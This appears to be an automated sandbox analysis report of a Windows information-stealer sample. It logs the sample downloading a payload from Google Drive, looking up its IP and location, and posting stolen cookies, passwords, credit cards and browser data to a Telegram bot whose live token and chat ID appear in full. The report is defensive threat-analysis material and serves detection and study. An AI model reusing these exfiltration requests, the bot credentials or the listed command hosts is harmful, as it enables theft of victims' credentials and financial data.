            Source: global trafficHTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f1a7d0f69c8Host: api.telegram.orgContent-Length: 742
            Source: global trafficHTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACreditCard%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f45bd19a0d5Host: api.telegram.orgContent-Length: 598Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ADownloads%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f79cbeac367Host: api.telegram.orgContent-Length: 596Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AHistory%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5fb00e832d02Host: api.telegram.orgContent-Length: 592Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ATopSites%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5fe73a8a400cHost: api.telegram.orgContent-Length: 941Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AAutoFill%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd602ac456f2b6Host: api.telegram.orgContent-Length: 594Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AInstalled%20Softwares%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd60976c69a7f8Host: api.telegram.orgContent-Length: 973Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AInstalled%20Browsers%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd60ef14f4b094Host: api.telegram.orgContent-Length: 975Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49712 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49709 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49719 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49711 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49707 -> 142.250.185.142:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1XPI1EXGrpy_hlaI5KpuYvokgvS_MVIXw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1XPI1EXGrpy_hlaI5KpuYvokgvS_MVIXw&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.11:49710 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1XPI1EXGrpy_hlaI5KpuYvokgvS_MVIXw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1XPI1EXGrpy_hlaI5KpuYvokgvS_MVIXw&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2008/03/2025%20/%2019:00:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5ef2e8206767Host: api.telegram.orgContent-Length: 582
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 21:18:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000035119000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: CWu89IbJQw.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: CWu89IbJQw.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000035119000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F8A000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20a
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=7440
            Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.0000000035F68000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.0000000035F68000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003503E000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003506F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003503E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000035039000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.00000000046E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.00000000046E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/e
            Source: CWu89IbJQw.exe, 0000000C.00000002.3589604649.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XPI1EXGrpy_hlaI5KpuYvokgvS_MVIXw
            Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004744000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004745000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.2649662449.000000000474B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004744000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004745000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.2649723666.0000000004784000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/0
            Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004730000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004722000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004730000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1XPI1EXGrpy_hlaI5KpuYvokgvS_MVIXw&export=download
            Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.0000000035F68000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F8A000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F6A000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F8A000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F24000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.0000000035F68000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.0000000035F68000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003506F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003506F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003506A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.11:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.11:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49726 version: TLS 1.2
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
